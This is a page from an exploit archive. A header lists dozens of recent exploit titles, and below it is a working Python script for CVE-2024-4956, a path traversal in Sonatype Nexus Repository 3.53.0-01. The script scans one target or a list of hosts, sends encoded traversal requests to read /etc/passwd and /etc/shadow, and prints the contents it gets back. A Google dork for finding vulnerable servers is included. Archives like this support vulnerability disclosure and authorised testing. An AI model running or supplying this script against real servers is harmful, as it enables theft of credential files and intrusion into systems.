60175c9963
52 changes to exploits/shellcodes/ghdb Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS) Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS) Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE) DataEase 2.4.0 - Database Configuration Information Exposure Cosy+ firmware 21.2s7 - Command Injection Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE) K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS) ABB Cylon Aspect 3.07.02 - File Disclosure (Authenticated) ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE) ABB Cylon Aspect 3.07.02 - File Disclosure ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE) Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover CyberPanel 2.3.6 - Remote Code Execution (RCE) IBM Security Verify Access 10.0.0 - Open Redirect during OAuth Flow Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE) KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR) MagnusSolution magnusbilling 7.3.0 - Command Injection Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover Progress Telerik Report Server 2024 Q1 (10.0.24.305) - Authentication Bypass Sonatype Nexus Repository 3.53.0-01 - Path Traversal Watcharr 1.43.0 - Remote Code Execution (RCE) Webmin Usermin 2.100 - Username Enumeration ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials ABB Cylon Aspect 3.08.01 - Arbitrary File Delete ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials ABB Cylon Aspect 3.08.01 - Arbitrary File Delete AquilaCMS 1.409.20 - Remote Command Execution (RCE) Artica Proxy 4.50 - Remote Code Execution (RCE) Centron 19.04 - Remote Code Execution (RCE) ChurchCRM 5.9.1 - SQL Injection CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS) CodeCanyon RISE CRM 3.7.0 - SQL Injection Elaine's Realtime CRM Automation 6.18.17 - Reflected XSS Feng Office 3.11.1.2 - SQL Injection flatCore 1.5 - Cross Site Request Forgery (CSRF) flatCore 1.5.5 - Arbitrary File Upload flatCore 1.5 - Cross Site Request Forgery (CSRF) flatCore 1.5.5 - Arbitrary File Upload GetSimpleCMS 3.3.16 - Remote Code Execution (RCE) Gnuboard5 5.3.2.8 - SQL Injection LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection Litespeed Cache 6.5.0.1 - Authentication Bypass MiniCMS 1.1 - Cross Site Scripting (XSS) MoziloCMS 3.0 - Remote Code Execution (RCE) NEWS-BUZZ News Management System 1.0 - SQL Injection PandoraFMS 7.0NG.772 - SQL Injection phpIPAM 1.6 - Reflected Cross Site Scripting (XSS) PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF) ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS) RosarioSIS 7.6 - SQL Injection Roundcube Webmail 1.6.6 - Stored Cross Site Scripting (XSS) Typecho 1.3.0 - Race Condition Typecho 1.3.0 - Stored Cross-Site Scripting (XSS) Typecho 1.3.0 - Race Condition Typecho 1.3.0 - Stored Cross-Site Scripting (XSS) X2CRM 8.5 - Stored Cross-Site Scripting (XSS) Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE) Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure
93 lines
No EOL
3.6 KiB
Python
Executable file
93 lines
No EOL
3.6 KiB
Python
Executable file
# Exploit Title: Sonatype Nexus Repository 3.53.0-01 - Path Traversal
|
|
# Google Dork: header="Server: Nexus/3.53.0-01 (OSS)"
|
|
# Date: 2024-09-22
|
|
# Exploit Author: VeryLazyTech
|
|
# GitHub: https://github.com/verylazytech/CVE-2024-4956
|
|
# Vendor Homepage: https://www.sonatype.com/nexus-repository
|
|
# Software Link: https://www.sonatype.com/nexus-repository
|
|
# Version: 3.53.0-01
|
|
# Tested on: Ubuntu 20.04
|
|
# CVE: CVE-2024-4956
|
|
|
|
import requests
|
|
import random
|
|
import argparse
|
|
from colorama import Fore, Style
|
|
|
|
green = Fore.GREEN
|
|
magenta = Fore.MAGENTA
|
|
cyan = Fore.CYAN
|
|
mixed = Fore.RED + Fore.BLUE
|
|
red = Fore.RED
|
|
blue = Fore.BLUE
|
|
yellow = Fore.YELLOW
|
|
white = Fore.WHITE
|
|
reset = Style.RESET_ALL
|
|
bold = Style.BRIGHT
|
|
colors = [green, cyan, blue]
|
|
random_color = random.choice(colors)
|
|
|
|
|
|
def banner():
|
|
banner = f"""{bold}{random_color}
|
|
______ _______ ____ ___ ____ _ _ _ _ ___ ____ __
|
|
/ ___\ \ / / ____| |___ \ / _ \___ \| || | | || | / _ \| ___| / /_
|
|
| | \ \ / /| _| __) | | | |__) | || |_ | || || (_) |___ \| '_ \
|
|
| |___ \ V / | |___ / __/| |_| / __/|__ _| |__ _\__, |___) | (_) |
|
|
\____| \_/ |_____| |_____|\___/_____| |_| |_| /_/|____/ \___/
|
|
|
|
__ __ _ _____ _
|
|
\ \ / /__ _ __ _ _ | | __ _ _____ _ |_ _|__ ___| |__
|
|
\ \ / / _ \ '__| | | | | | / _` |_ / | | | | |/ _ \/ __| '_ \
|
|
\ V / __/ | | |_| | | |__| (_| |/ /| |_| | | | __/ (__| | | |
|
|
\_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_|
|
|
|___/ |___/
|
|
|
|
{bold}{white}@VeryLazyTech - Medium {reset}\n"""
|
|
|
|
return banner
|
|
|
|
|
|
def read_ip_port_list(file_path):
|
|
with open(file_path, 'r') as file:
|
|
lines = file.readlines()
|
|
return [line.strip() for line in lines]
|
|
|
|
|
|
def make_request(ip_port, url_path):
|
|
url = f"http://{ip_port}/{url_path}"
|
|
try:
|
|
response = requests.get(url, timeout=5)
|
|
return response.text
|
|
except requests.RequestException as e:
|
|
return None
|
|
|
|
|
|
def main(ip_port_list):
|
|
for ip_port in ip_port_list:
|
|
for url_path in ["%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/passwd", "%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/shadow"]:
|
|
response_text = make_request(ip_port, url_path)
|
|
if response_text and "nexus:x:200:200:Nexus Repository Manager user:/opt/sonatype/nexus:/bin/false" not in response_text and "Not Found" not in response_text and "400 Bad Request" not in response_text and "root" in response_text:
|
|
print(f"Address: {ip_port}")
|
|
print(f"File Contents for passwd:\n{response_text}" if "passwd" in url_path else f"File Contents for shadow:\n{response_text}")
|
|
break
|
|
|
|
|
|
if __name__ == "__main__":
|
|
parser = argparse.ArgumentParser(description=f"[{bold}{blue}Description{reset}]: {bold}{white}Vulnerability Detection and Exploitation tool for CVE-2024-4956", usage=argparse.SUPPRESS)
|
|
group = parser.add_mutually_exclusive_group(required=True)
|
|
group.add_argument("-u", "--url", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a URL or IP with port for vulnerability detection\n")
|
|
group.add_argument("-l", "--list", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a list of URLs or IPs for vulnerability detection\n")
|
|
args = parser.parse_args()
|
|
|
|
if args.list:
|
|
ip_port_list = read_ip_port_list(args.list)
|
|
print(banner())
|
|
main(ip_port_list)
|
|
elif args.url:
|
|
ip_port_list = [args.url]
|
|
print(banner())
|
|
main(ip_port_list)
|
|
else:
|
|
print(banner())
|
|
parser.print_help() |